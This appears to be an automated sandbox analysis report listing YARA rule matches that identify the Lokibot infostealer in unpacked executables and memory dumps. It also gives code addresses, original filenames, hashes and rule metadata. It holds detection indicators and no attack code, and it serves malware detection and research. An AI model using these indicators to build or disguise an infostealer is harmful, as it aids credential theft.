Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: YvVDV4cbjy.exe PID: 736, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: HxQXdrrQ.exe PID: 1632, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: HxQXdrrQ.exe PID: 7096, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Code function: 0_2_013C3E28	0_2_013C3E28
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Code function: 0_2_013C6F90	0_2_013C6F90
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Code function: 0_2_013CDFB4	0_2_013CDFB4
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Code function: 0_2_077B9D68	0_2_077B9D68
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Code function: 0_2_077B5650	0_2_077B5650
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Code function: 0_2_077B9D59	0_2_077B9D59
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Code function: 0_2_077B3D98	0_2_077B3D98
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Code function: 0_2_077B6438	0_2_077B6438
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Code function: 0_2_077BCBE8	0_2_077BCBE8
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Code function: 0_2_077B5A88	0_2_077B5A88
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Code function: 0_2_077B41D0	0_2_077B41D0
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 10_2_00D93E28	10_2_00D93E28
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 10_2_00D96F90	10_2_00D96F90
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 10_2_00D9DFB4	10_2_00D9DFB4
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 10_2_06F99009	10_2_06F99009
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 10_2_06F95650	10_2_06F95650
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 10_2_06F9BF68	10_2_06F9BF68
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 10_2_06F96438	10_2_06F96438
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 10_2_06F93D98	10_2_06F93D98
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 10_2_06F95A88	10_2_06F95A88
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 10_2_06F941D0	10_2_06F941D0
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 10_2_071F08A4	10_2_071F08A4
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 10_2_071F2518	10_2_071F2518
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 10_2_071F08F8	10_2_071F08F8
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 15_2_0040549C	15_2_0040549C
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 15_2_004029D4	15_2_004029D4

Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: String function: 00405B6F appears 42 times

Source: YvVDV4cbjy.exe, 00000000.00000002.2067776523.0000000004048000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs YvVDV4cbjy.exe
Source: YvVDV4cbjy.exe, 00000000.00000002.2076464821.0000000005930000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs YvVDV4cbjy.exe
Source: YvVDV4cbjy.exe, 00000000.00000000.2020659703.0000000000C96000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEpxIZ.exe" vs YvVDV4cbjy.exe
Source: YvVDV4cbjy.exe, 00000000.00000002.2065627493.0000000003019000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs YvVDV4cbjy.exe
Source: YvVDV4cbjy.exe, 00000000.00000002.2063301617.00000000013DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs YvVDV4cbjy.exe
Source: YvVDV4cbjy.exe, 00000000.00000002.2077844783.0000000007730000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs YvVDV4cbjy.exe
Source: YvVDV4cbjy.exe	Binary or memory string: OriginalFilenameEpxIZ.exe" vs YvVDV4cbjy.exe

Source: YvVDV4cbjy.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
